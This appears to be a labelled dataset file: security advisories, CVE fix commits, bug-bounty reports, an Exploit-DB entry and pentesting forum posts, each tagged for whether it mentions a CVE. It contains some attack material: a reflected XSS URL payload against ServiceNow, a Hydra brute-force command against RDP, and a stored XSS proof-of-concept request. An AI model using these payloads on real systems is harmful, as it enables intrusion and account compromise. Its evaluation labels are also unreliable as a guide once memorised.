+{"id": "35cfb22fa1e6718ef0d7", "text": "Snyk plugins vulnerable to Command Injection\n\n[Severity: MEDIUM]\n\nThe package snyk before 1.1064.0; the package snyk-mvn-plugin before 2.31.3; the package snyk-gradle-plugin before 3.24.5; the package @snyk/snyk-cocoapods-plugin before 2.5.3; the package snyk-sbt-plugin before 2.16.2; the package snyk-python-plugin before 1.24.2; the package snyk-docker-plugin before 5.6.5; the package @snyk/snyk-hex-plugin before 1.1.6 are vulnerable to Command Injection due to an incomplete fix for [CVE-2022-40764](https://security.snyk.io/vuln/SNYK-JS-SNYK-3037342). A successful exploit allows attackers to run arbitrary commands on the host system where the Snyk CLI is installed by passing in crafted command line flags. In order to exploit this vulnerability, a user would have to execute the snyk test command on untrusted files. In most cases, an attacker positioned to control the command line arguments to the Snyk CLI would already be positioned to execute arbitrary commands. However, this could be abused in specific scenarios, such as continuous integration pipelines, where developers can control the arguments passed to the Snyk CLI to leverage this component as part of a wider attack against an integration/build pipeline. This issue has been addressed in the latest Snyk Docker images available at https://hub.docker.com/r/snyk/snyk as of 2022-11-29. Images downloaded and built prior to that date should be updated. The issue has also been addressed in the Snyk TeamCity CI/CD plugin as of version v20221130.093605.", "source": "github_advisory", "timestamp": "2022-11-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c2a431032c22e28bd244", "text": "CVE: CVE-2022-25319\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. Endpoints could be open even when not enabled.'}]\n\nFix commit: fix: [security] open endpoints should only be open when enabled\n\n- as reported by Dawid Czarnecki from Zigrin Security", "source": "cvefixes", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ce3109d07c1b7867e4ba", "text": "Stored Cross-site Scripting in Jenkins Mask Passwords Plugin\n\n[Severity: MEDIUM]\n\nJenkins Mask Passwords Plugin 3.0 and earlier does not escape the name and description of Non-Stored Password parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix.", "source": "github_advisory", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0d8f5148fee06cd44500", "text": "Thank you very much, you have helped me to find the flag. I have followed the following steps: 1). I have used the code provided by @XSSDoctor and generated the binary. 2). I have opened the binary with “gdb” and made a breakpoint after the “xor”. The idea is to get the value of the “rdx” register in each of the 14 iterations. The ShellCode is the concatenation of the 14 iterations. 3). You run the ShellCode. I ended up very tired after this", "source": "hackthebox", "timestamp": "2023-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9d2a57e55f1206be9463", "text": "Text me If you want! I will support you! my discord satellite#1213", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "dbfaefb2055e422e2f97", "text": "x86 Visual Studio C++ MASM Assembly Bending Sprites Plugin info\n\nHi All, Currently I am attempting to create a bending sprite plugin using x86 Visual Studio C++ MASM Assembly as currently the DarkGDK game engine I am using is good but doesn't support bending sprites. What you can post on this thread: If you have made a bending sprite plugin made in x86 assembly share the info or ideas you have on this thread. Also if you have any ideas of the best way to reverse engineer a C++ DLL you can share that info as well as I am currently trying to reverse engineer an game AI Engine DLL.", "source": "go4expert", "timestamp": "2023-04-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "401d3b1c0816293f73a8", "text": "Hey, I have been stuck in getting the second flag. Any hints are appreciated!", "source": "hackthebox", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f88ff59c15382991ec33", "text": "give and take that android is Linux or a form of it , rooting from Linux should be a better experienced , and due to mostly everything involving a tool to download on windows you have to pay for , i myself wouldn’t mind devlo[ping software for this purpose , hence myself asking", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4c4d3f1918c070f73779", "text": "Thanks, that helped a lot!! Also, in this case, you have to use -u with hydra in order to try alle usernames per password instead of first trying all passwords with one username (hope I formulated it clearly …) … this will significantly speed up the process.", "source": "hackthebox", "timestamp": "2023-06-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c51298199bb723171997", "text": "CVE: CVE-2022-24751\n\n[{'lang': 'en', 'value': 'Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds.'}]\n\nFix commit: CVE-2022-24751: Clear sessions outside of the transaction.\n\nClearing the sessions inside the transaction makes Zulip vulnerable to\na narrow window where the deleted session has not yet been committed,\nbut has been removed from the memcached cache. During this window, a\nrequest with the session-id which has just been deleted can\nsuccessfully re-fill the memcached cache, as the in-database delete is\nnot yet committed, and thus not yet visible. After the delete\ntransaction commits, the cache will be left with a cached session,\nwhich allows further site access until it expires (after\nSESSION_COOKIE_AGE seconds), is ejected from the cache due to memory\npressure, or the server is upgraded.\n\nMove the session deletion outside of the transaction.\n\nBecause the testsuite runs inside of a transaction, it is impossible\nto test this is CI; the testsuite uses the non-caching\n`django.contrib.sessions.backends.db` backend, regardless. The test\nadded in this commit thus does not fail before this commit; it is\nmerely a base expression that the session should be deleted somehow,\nand does not exercise the assert added in the previous commit.", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "20eabdf509af91596700", "text": "Rixker0-Sarkar0: The parrot archive url of “open books” has changed currently its on, Hello. Check it again: https://archive.parrotsec.org/parrot/misc/misc/openbooks/", "source": "parrotsec", "timestamp": "2022-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d840c13883f22a5a4674", "text": "Hi, Did you try Behindflare? https://pkg.go.dev/github.com/alebeta90/behindflare#section-readme GitHub GitHub - alebeta90/behindflare: This tool was created as a Proof of Concept ... This tool was created as a Proof of Concept to reveal the threats related to web service misconfiguration using CloudFlare as reverse proxy and WAF - GitHub - alebeta90/behindflare: This tool was ... Or Shodan maybe? Shodan Shodan Search engine of Internet-connected devices. Create a free account to get started.", "source": "hackersploit", "timestamp": "2022-03-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "44ee9b4643ef7e9f0236", "text": "Proxychains can’t run on another proxies except for the localhost\n\nHey I tried to use proxychains and it work on socks4/5 127.0.0.1 9050 but it is always showing need more proxies when i use any proxy addresses except for the 127.0.0.1 proxy. So do you guys knows how to fixed it?", "source": "parrotsec", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bb20940384c531be00c7", "text": "CVE: CVE-2022-27311\n\n[{'lang': 'en', 'value': 'Gibbon v3.4.4 and below allows attackers to execute a Server-Side Request Forgery (SSRF) via a crafted URL.'}]\n\nFix commit: Ensure we raise if the root domain changed and it was not an expected behavior", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c5006b0db4f277240efd", "text": "[Cross-site Scripting (XSS) - Reflected] XSS in ServiceNow logout https://████:443\n\n**Description:**\nXSS in ServiceNow logout \nhttps://██████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n## References\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-38463\n\n## Impact\n\nUnauthenticated remote attacker can execute code in user's browser context. User must click on malicious link\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\nServicenow prior to SanDiego SP6\n\n## CVE Numbers\nCVE-2022-38463\n\n## Steps to Reproduce\nClick on https://█████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n## Suggested Mitigation/Remediation Actions\nUpgrade to patched version of ServiceNow", "source": "hackerone", "timestamp": "2023-05-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "90ee38db0400d058278a", "text": "Denial of Service (DoS) in Nokogiri on JRuby\n\n[Severity: HIGH]\n\n## Summary\n\nNokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv). That CVE is rated 7.5 (High Severity).\n\nSee [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) for more information.\n\nPlease note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.\n\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.13.4`.\n\n\n## Impact\n\n### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml\n\n- **Severity**: High 7.5\n- **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption\n- **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.\n- **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)\n", "source": "github_advisory", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a20bd34d984ee52068cc", "text": "CVE: CVE-2022-1997\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 9.0.'}]\n\nFix commit: Fix stored XSS security issue: remove inline JS from URL in PreparePHP_SELF.fnc.php", "source": "cvefixes", "timestamp": "2022-06-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "999d106baf73792a5e29", "text": "Working with Web Services, linux fundamentals\n\nhello i am unsure about question “Find a way to start a simple HTTP server inside Pwnbox or your local VM using “npm”. Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).” i tried … npm install -g http-server; server-http -p 8080 i get a response ideal tree lib", "source": "hackthebox", "timestamp": "2022-09-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8f7647530e602b8c5cf8", "text": "CVE: CVE-2022-0318\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4151: reading beyond the end of a line\n\nProblem: Reading beyond the end of a line.\nSolution: For block insert only use the offset for correcting the length.", "source": "cvefixes", "timestamp": "2022-01-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "498652b4ce3977126050", "text": "Dictionary Password Cracking (A THC Hydra starter guide)\n\nHello! In this tutorial, we will explore how to run a dictionary attack of THC Hydra. Let’s get started. If you are running Kali Linux you will already have a version of Hydra installed. If not you can install it on Linux platforms using the command sudo apt-get install hydra or just download it from the Github Repository https://github.com/vanhauser-thc/thc-hydra . Once you have finished the installation you have a new application called THC-Hydra. It should look like this: image 523×616 46.3 KB THC Hydra has the option of running a dictionary attack or a brute force attack, however, in this tutorial, we will focus on the Dictionary Attack option. In the THC Hydra folder, you can import wordlists for dictionary attacks. I am getting mine from skullsecurity.org . In this, I am using the Rockyou.txt wordlist. To start the cracking, you would input command like this. hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://Add IP ADRESS HERE . If you did everything correctly it should look like this: image 945×597 155 KB Congratulations! You were able to run a dictionary attack using THC Hydra. I hope this helps you. C_J", "source": "hackersploit", "timestamp": "2022-08-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f56816d6865c22823734", "text": "LOL thank you so much … ■■■■! I think that HTB should have made that more clear … unless I overlooked something, I don’t think there is a very clear cut order to use the Wireshark-lab-2.zip", "source": "hackthebox", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "57e29c71febe8d509ad7", "text": "Did you end up getting it? Took me a while to see why it wasn’t working through the debugger. I get it now. This info really helped break looks the cobwebs in my head: Skills Assessment - 32 bit buffer overflow HTB ACADEMY Tools You can only debug a setuid or setgid program if the debugger is running as root. The kernel won't let you call ptrace on a program running with extra privileges. If it did, you would be able to make the program execute anything, which would effectively mean you could e.g. run a root shell by calling a debugger on /bin/su. So you might need to think of another way to get the shellcode triggered outside GDB", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "290a93554ab39d2c97cd", "text": "Sales Tracker Management System v1.0 - Multiple Vulnerabilities\n\nExploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities\nGoogle Dork: NA\nDate: 09-06-2023\nEXPLOIT-AUTHOR: AFFAN AHMED\nVendor Homepage: \nSoftware Link: \nVersion: 1.0\nTested on: Windows 11 + XAMPP\nCVE : CVE-2023-3184\n\n==============================\nCREDENTIAL TO USE\n==============================\nADMIN-ACCOUNT\nUSERNAME: admin\nPASSWORD: admin123\n\n=============================\nPAYLOAD_USED\n=============================\n1. CLICK_HERE_FOR_FIRSTNAME \n2. CLICK_HERE_FOR_MIDDLENAME \n3. CLICK_HERE_FOR_LASTNAME \n4. CLICK_HERE_FOR_USERNAME \n\n\n===============================\nSTEPS_TO_REPRODUCE\n===============================\n1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN\n2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`\n3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username`\n4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON\n5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED .\n6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE\n\n\n\n==========================================\nBURPSUITE_REQUEST\n==========================================\nPOST /php-sts/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 1037\nsec-ch-ua:\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36\nsec-ch-ua-platform: \"\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/php-sts/admin/?page=user/manage_user\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn\nConnection: close\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"id\"\n\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"firstname\"\n\nCLICK_HERE_FOR_FIRSTNAME \n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"middlename\"\n\nCLICK_HERE_FOR_MIDDLENAME \n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"lastname\"\n\nCLICK_HERE_FOR_LASTNAME \n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"username\"\n\nCLICK_HERE_FOR_USERNAME \n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"password\"\n\n1234\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"type\"\n\n2\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo--\n\n===============================\nPROOF_OF_CONCEPT\n===============================\nGITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md", "source": "exploitdb", "timestamp": "2023-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "21d2c419107bc0c0a0a0", "text": "Just Started Using Parrot, Any Guidance Or Roadmap To Ethical Hacking?\n\nHow should a beginner like me learn ethical hacking with parrot os", "source": "parrotsec", "timestamp": "2023-03-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f50c3c0d05f0026428ba", "text": "Given the question in that section of the module, I’ve tried: 1.) Running the program as is 2.) Checking the ebp register. 3.) Inputting the address as the answer 4.) Answer is incorrect Since this did not work, I thought maybe it’s referring to the address of ebp at main. I tried: 1.) Setting a breakpoint at main 2.) Running program 3.) Inputting the address of ebp at that breakpoint 4.) Answer is incorrect At this point, I’m pretty confused. Going over my notes again. Reading through that section again. I saw this thread on the forum and decided to do the following: 1.) Create the string using the python tool provided in the section 2.) Inputing the command provided in the section example, using the string. 3.) Running the program 4.) Checking register ebp and submitting the address as the answer 5.) Answer is incorrect I know I’m doing something wrong here. I’m out of ideas. Any hints? *Edit. I’ve also tried reversing the order of bytes from the address due to little endianness, still not the correct answer.", "source": "hackthebox", "timestamp": "2022-11-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c386738bed69a8cd08ea", "text": "CVE: CVE-2022-31050\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, Admin Tool sessions initiated via the TYPO3 backend user interface had not been revoked even if the corresponding user account was degraded to lower permissions or disabled completely. This way, sessions in the admin tool theoretically could have been prolonged without any limit. TYPO3 versions 9.5.34 ELTS, 10.4.29, and 11.5.11 contain a fix for the problem.'}]\n\nFix commit: [SECURITY] Synchronize admin tools session with backend user session\n\nAdmin tools sessions are revoked in case the initiatin backend user\ndoes not have admin or system maintainer privileges anymore. Besides\nthat, revoking backend user interface sessions now also revokes access\nto admin tools. Standalone install tool is not affected.\n\nResolves: #92019\nReleases: main, 11.5, 10.4\nChange-Id: I367098abd632fa34caa59e4e165f5ab1916894c5\nSecurity-Bulletin: TYPO3-CORE-SA-2022-005\nSecurity-References: CVE-2022-31050\nReviewed-on: https://review.typo3.org/c/Packages/TYPO3.CMS/+/74905\nTested-by: Oliver Hader \nReviewed-by: Oliver Hader ", "source": "cvefixes", "timestamp": "2022-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "27a36f6992aa0a042e87", "text": "CVE: CVE-2022-23618\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions there is no protection against URL redirection to untrusted sites, in particular some well known parameters (xredirect) can be used to perform url redirections. This problem has been patched in XWiki 12.10.7 and XWiki 13.3RC1. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-10309: Check URL domains based on a whitelist (#1592)\n\nIntroduce a new property for listing the trusted domains and API to\r\ncheck an URL against that list and the aliases used in subwikis.\r\n\r\n * Add new property url.trustedDomains in xwiki.properties\r\n * Add new API in URLConfiguration to retrieve this configuration value\r\n * Create a new URLSecurityManager responsible to check if an URL can\r\n be trusted based on this property and on the subwikis configurations\r\n * Introduce a new listener to invalidate the cache of\r\n URLSecurityManager whenever a XWikiServerClass xobject is\r\nadded/updated/deleted\r\n * Move URL API implementations to URL default module\r\n * Add a new property url.enableTrustedDomains as a global switch off the\r\n checks on domains to avoid breaking behaviours on existing instances\r\n * Add a constant property in URLSecurityManager to be set in\r\n ExecutionContext to allow temporary switch off the check for\r\nextensions\r\n * Use both those switches in DefaultURLSecurityManager to prevent\r\n performing the check when needed", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3cf53754363db20cd464", "text": "CVE: CVE-2022-29196\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.Conv3DBackpropFilterV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate that the `filter_sizes` argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix failed check in Conv3DBackpropFilterV2.\n\nPassing in a rank-0 `filter_size` causes a check fail and crash,\ncoming from a `filter_size.vec<>()` call. Here we check the size\nfirst.\n\nPiperOrigin-RevId: 445517122", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b003c277850ae2495808", "text": "Help to acces control over Wifi\n\nHI, I am a newbie, and I would like someone to help me, or send some instructions to gain a control over wifi router. I was trying few things, but unsuccessful. Thanks for your reply.", "source": "parrotsec", "timestamp": "2022-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4582bbb1a62c2ed5509b", "text": "CVE: CVE-2022-0848\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11.'}]\n\nFix commit: Disallow uploading of potentially unsafe file extensions.", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "925359b67ab07a2fe00d", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27536: GSS delegation too eager connection re-use\n\n## Summary:\nWhen considering reuse of existing connections different `CURLOPT_GSSAPI_DELEGATION` (libcurl) `--delegation` (curl) option is not taken into consideration. This can lead to reuse of previously established connection when it should no longer be (as more strict or no delegation was requested).\n\n## Steps To Reproduce:\n\n 1. `curl --negotiate -u : --delegation \"always\" https://server/path -: --negotiate -u : --delegation \"none\" https://server/path`\n\n## Remediation\n\n- Safest option is to not reuse connections if different `CURLOPT_GSSAPI_DELEGATION` levels are being used. It **might** also be correct to not reuse connections with \"laxer\" `CURLOPT_GSSAPI_DELEGATION`: \"none\" should only allow reusing \"none\" level, \"policy\" should only allow \"none\" or \"policy\" level, while \"always\" can reuse all connections otherwise deemed appropriate for reuse.\n\n## Impact\n\nExisting connection that was established via more lax delegation will be reused for connection that should not succeed due to more restrictive delegation requested. The practical impact can vary, but I believe it is likely quite low, as it should be quite rare to have connections attempted with mixed delegation policies like this.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6fc613bacf90d2de0ae0", "text": "CVE: CVE-2022-31145\n\n[{'lang': 'en', 'value': 'FlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. In versions 1.1.30 and prior, authenticated users using an external identity provider can continue to use Access Tokens and ID Tokens even after they expire. Users who use FlyteAdmin as the OAuth2 Authorization Server are unaffected by this issue. A patch is available on the `master` branch of the repository. As a workaround, rotating signing keys immediately will invalidate all open sessions and force all users to attempt to obtain new tokens. Those who use this workaround should continue to rotate keys until FlyteAdmin has been upgraded and hide FlyteAdmin deployment ingress URL from the internet.'}]\n\nFix commit: Merge pull request from GHSA-qwrj-9hmp-gpxh\n\n* Fix claims verification for access tokens in external IdP setup\n\nSigned-off-by: Haytham Abuelfutuh \n\n* Add another test case for no signature\n\nSigned-off-by: Haytham Abuelfutuh ", "source": "cvefixes", "timestamp": "2022-07-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "af498dd434ed0cddae1f", "text": "I’m stuck on this too. What do you mean by FW rule?", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8cab6b7c208a99074090", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8367, CVE-2018-8465, CVE-2018-8466.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d55bbbd9b2a1039b6b08", "text": "CVE: CVE-2022-33127\n\n[{'lang': 'en', 'value': 'The function that calls the diff tool in Diffy 3.4.1 does not properly handle double quotes in a filename when run in a windows environment. This allows attackers to execute arbitrary commands via a crafted string.'}]\n\nFix commit: Remove windows specific exec. Open2.capture3 should work on all\nplatforms.", "source": "cvefixes", "timestamp": "2022-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "60ded6558c1ad7e0d61d", "text": "I am getting a connection refused error whenever I generate a target ip and try to connect to it in anyway. I cannot nmap scan or do anything with the target. Is anyone experiencing this? Doesnt work on the parrot VM, multiple PCs, multiple browsers and even tried refreshing the IP several times. Examples below image 546×115 9.96 KB", "source": "hackthebox", "timestamp": "2022-12-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ccf2ccab397b09e3a355", "text": "I am gonna help you because I received many helps here too. To get the correct results from ffuf, you need to ensure that the IP address after -u contains a http in front (eg http://1.1.1.1 ). In addition, the -H parameter will need to have NO http in front (eg: Host: FUZZ.example.com ). Also remove all your hosts entry related to HTB from /etc/hosts, if any. Should be working after this. Btw your flag 1 is incorrect. You will know once you get the results from ffuf.", "source": "hackthebox", "timestamp": "2022-08-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "696d42df144385bcc999", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based)L, aka Chakra Scripting Engine Memory Corruption Vulnerability. This CVE ID is unique from CVE-2020-0811.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f48386d9cc547669016a", "text": "HL7 FHIR Partial Path Zip Slip due to bypass of CVE-2023-24057\n\n[Severity: HIGH]\n\n### Impact\n\nZip Slip protections implemented in CVE-2023-24057 (GHSA-jqh6-9574-5x22) can be bypassed due a partial path traversal vulnerability.\n\nThis issue allows a malicious actor to potentially break out of the `TerminologyCacheManager` cache directory. The impact is limited to sibling directories.\n\nTo demonstrate the vulnerability, consider `userControlled.getCanonicalPath().startsWith(\"/usr/out\")` will allow an attacker to access a directory with a name like `/usr/outnot`. \n\n### Why?\n\nTo demonstrate this vulnerability, consider `\"/usr/outnot\".startsWith(\"/usr/out\")`.\nThe check is bypassed although `/outnot` is not under the `/out` directory.\nIt's important to understand that the terminating slash may be removed when using various `String` representations of the `File` object.\nFor example, on Linux, `println(new File(\"/var\"))` will print `/var`, but `println(new File(\"/var\", \"/\")` will print `/var/`;\nhowever, `println(new File(\"/var\", \"/\").getCanonicalPath())` will print `/var`.\n\n### The Fix\n\nComparing paths with the `java.nio.files.Path#startsWith` will adequately protect againts this vulnerability.\n\nFor example: `file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY)` or `file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY_FILE.getCanonicalFile().toPath())`\n\n### Other Examples\n\n - [CVE-2022-31159](https://github.com/aws/aws-sdk-java/security/advisories/GHSA-c28r-hw5m-5gv3) - aws/aws-sdk-java\n - [CVE-2022-23457](https://securitylab.github.com/advisories/GHSL-2022-008_The_OWASP_Enterprise_Security_API/) - ESAPI/esapi-java-legacy\n\n### Vulnerability\n\nhttps://github.com/hapifhir/org.hl7.fhir.core/blob/b0daf666725fa14476d147522155af1e81922aac/org.hl7.fhir.r4b/src/main/java/org/hl7/fhir/r4b/terminologies/TerminologyCacheManager.java#L99-L105\n\nWhile `getAbsolutePath` will return a normalized path, because the string `path` is not slash terminated, the guard can be bypassed to write the contents of the Zip file to a sibling directory of the cache directory.\n\n### Patches\nAll org.hl7.fhir.core libraries should be updated to 5.6.106.\n - https://github.com/hapifhir/org.hl7.fhir.core/pull/1162\n\n### Workarounds\nUnknown\n\n### References\n* https://snyk.io/research/zip-slip-vulnerability\n", "source": "github_advisory", "timestamp": "2023-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
